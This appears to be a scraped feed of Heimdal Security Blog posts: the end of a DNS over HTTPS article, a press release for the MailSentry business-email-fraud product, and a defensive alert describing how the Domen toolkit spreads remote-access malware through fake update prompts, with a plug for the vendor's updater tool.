Like any IT innovation, DNS over HTTPS can pose a few challenges at first, until everyone gets aligned with it. But once DoH becomes the standard, the benefits of it will greatly outweigh the difficulties it poses in the beginning.

The post Enabling DNS over HTTPS (DoH): Advantages and Best Practices appeared first on Heimdal Security Blog.

Heimdal™ Security Launches MailSentry™, the Solution against Business Email Compromise (BEC)

When cybersecurity advances made hacking a more expensive illegal pursuit, would-be digital thieves switched to social engineering more and more. As long as they could get insiders to trust them, they could make off with company assets in an easier way than fighting the built-in cyber-defenses. That’s why Business Email Compromise (BEC) attacks have risen so much over the past few years.

Almost every month brings yet more news of successful BEC scams. It’s usually public institutions, like city administrations or hospitals, who get targeted by these scams the most. But businesses also make ripe targets for scammers. On average, a successful BEC scam can cost companies around $59,000 per incident, and from July 2016 to July 2019, the total losses caused by BEC scams surpassed $26 billion, according to FBI’s data.

To answer the need for extra defenses against BEC attacks, Heimdal™ Security launches MailSentry™. MailSentry™ is a cybersecurity module designed to identify and prevent email fraud. Beyond the simple protection, you can get from a spam filter, this new product will allow businesses everywhere to elude the paralysis of multiple person approvals and double-checks.

Morten Kjaersgaard, CEO Heimdal Security details:

“MailSentry™ will, at last, be able to secure the final frontier of cyberattacks: fraud which relies on human trust. Businesses can now no longer be preyed on by ruthless imposters or waste valuable time in double-checking and questioning every seemingly legitimate request. With our new MailSentry™ product, we expect to lead the market for all mail fraud technologies. From now on, you can prevent CEO fraud and business email compromise in a single blow dealt to hackers.”

How Will MailSentry™ Work?

MailSentry™ is a specialized add-on to any spam filter already in place. It will pair over 125 vectors to detect fraud attempts and properly flag them. Combining email signature scans to word scans in order to detect changed IBAN codes and so on, no suspicious detail will pass unnoticed.

The new MailSentry™ product will be available as part of a personalized Enterprise suite, or as a stand-alone module. With its complex network of vectors, the BEC protection cybersecurity product will automatically detect:

  • Business Email Compromise (BEC)
  • Email-deployed Malware
  • Phishing and Spear Phishing
  • Imposter Threats (Modified Invoices)
  • CEO Fraud and Criminal Impersonation
  • Man-in-the-email and Spoofing Attacks
  • Malicious content in historical emails


With MailSentry™ your business will also receive live monitoring 24/7 by a team specialized in BEC fraud defense. This way, you can detect malicious intent in due time and prevent any costly mistakes.

Raising employee awareness about scams and Business Email Compromise (BEC) is always a good idea, but businesses shouldn’t rely on it. MailSentry™ and its automatic scan vectors will help where human vigilance fails so that scammers won’t stand a chance.

At the same time, its intelligence will be aided by the expertise of the 24/7 specialist team on-call for analyzing suspicious emails. With MailSentry™, you can stand out from your competition by harnessing the capability of innovative technology, coupled with human ingeniousness.

You can read more about MailSentry™ and schedule a free demo HERE.

Note: MailSentry™ will be live and ready to deploy on 31st October 2019.

About Heimdal Security: Heimdal Security is an emerging cybersecurity company, founded in 2014 in Copenhagen by winners of the world ethical hacking competition Defcon CTF. Since then, the company has grown spectacularly, earning awards for both its proactive security suite (Anti-Malware Solution of the Year in 2018) and for its blog, providing intelligence to security outlets worldwide (Most Educational Security Blog in 2016).

The post Heimdal™ Security Launches MailSentry™, the Solution against Business Email Compromise (BEC) appeared first on Heimdal Security Blog.

SECURITY ALERT: New Domen Toolkit Pushes Malware through Fake Software Updates

A new toolkit has emerged in the past few days, infecting users via compromised websites.

Most of the compromised websites which are unknowingly hosting the toolkit are based on a WordPress script, which leaves them vulnerable to be exploited this way.

The toolkit has been dubbed Domen and abuses the trust of users in a classic social engineering move. Relying on the fact that most users are aware of the necessity of updates, the toolkit creators are piggyback riding on the trustworthiness of the programs they claim to represent.

When one sees a notification for a required update from a software brand they already have and trust, chances are they will approve without thinking twice. That’s how the Domen toolkit spreads and infects hosts, allowing hackers to access the infected devices remotely, to take screenshots, steal data and more.

The Domen toolkit was first discovered by security researcher Jérôme Segura, and further reported on by security researcher mol69.

How Does the Domen Toolkit Work?

The Domen Toolkit targets both PC and mobile users. So far, security researchers have discovered Domen messages being delivered in as many as 30 different languages. Besides the linguistic variety, the Domen toolkit is also remarkable in its high level of customization and sophistication.

Because of its complexity, the toolkit is able to adapt to various browsers, operating systems, clients and so on. This is what makes Domen more dangerous than the usual run-of-the-mill exploit kits abusing Flash vulnerabilities.

After an internet user visits a website infected with the Domen toolkit, they will start seeing pop-ups prompting them to install a ‘required’ software update. Those software update messages are delivered with regards to multiple software names and in 30 languages so far.

For example, here is a screenshot of a fake Chrome update prompt.

screenshot of fake chrome update notification

Screenshot courtesy of Bleeping Computer.

Once you click the button accepting the software update, a file named download.hta will be downloaded into your device.

Upon being executed, that file will then download a client-side remote access tool (template.js) into %Temp%\jscheck.exe. Unlike other toolkits, Domen allows this tool to be highly customized. The hacker using it can choose whatever malware payload they wish to deliver into the device after they infected. Therefore, not all users were then infected with the same malware strains after falling for the Domen fake update prompt.

The remote access tool installed by the initial file (download.hta) will automatically get installed and run after infection. If infected with it, you can notice it in your list of ongoing processes, under the name NetSupport Manager, as in the screenshot below.

screenshot of remote access malware in list of processes

Screenshot courtesy of Bleeping Computer.

However, if you got infected on a mobile device, doing this quick check might not be as easy.

Another piece of good news is that if your device is well protected by a strong next-gen Antivirus and a DNS traffic filter, the NetSupport Manager shouldn’t pass undetected. Your cybersecurity suite will definitely alert you that something is wrong.

Unfortunately, the Domen toolkit installs other things besides NetSupport Manager. It is up to the hacker running the campaign to choose what malware payload they wish delivered and installed, so what you get is a bit of a wildcard.

How to detect the Domen Toolkit and How to Stay Safe

As mentioned above, a surefire way to determine if your computer has been infected by the Domen Toolkit is to quickly run a process check. If the NetSupport Manager tool appears in the list of ongoing processes, you’re infected.

Depending on the stage of the infection, you might notice other signs that something is wrong. The signs that your computer is infected with malware are numerous and can differ depending on the exact malware you are infected with.

By and large, though, any sudden change, evidence of someone using your computer remotely, any apps or software you don’t remember installing, your browser homepage changing – all these are signs of a malware infection.

A good cybersecurity suite should help you get rid of the infections quickly, but by then the damage might already be done. If hackers used the infection to compromise your data or steal accounts, it could prove difficult to put a lid on it. As always, prevention is the best cure.

To make sure you don’t fall for the Domen toolkit or similar fake notifications, why not install an automatic software updater, like our Thor Free?

Get Thor Free

The Thor Free tool is free to use forever and it will close all outdated software vulnerabilities. Whenever an update is available for one of your installed software or apps, Thor Free will automatically apply the patch. It works silently, in the background, without requiring permissions and restarts every time.

This way, even if you get targeted by messages such as the ones used by the Domen toolkit, you will have no reason to think they are legit. You will already have a professional tool handling all your required updates.

Good luck and stay safe.

P.S: If you already have an active Thor Foresight Home or Thor Premium Home license, you are benefitting from the Thor Free functionalities so there’s no need to install the automatic software updater. 

The post SECURITY ALERT: New Domen Toolkit Pushes Malware through Fake Software Updates appeared first on Heimdal Security Blog.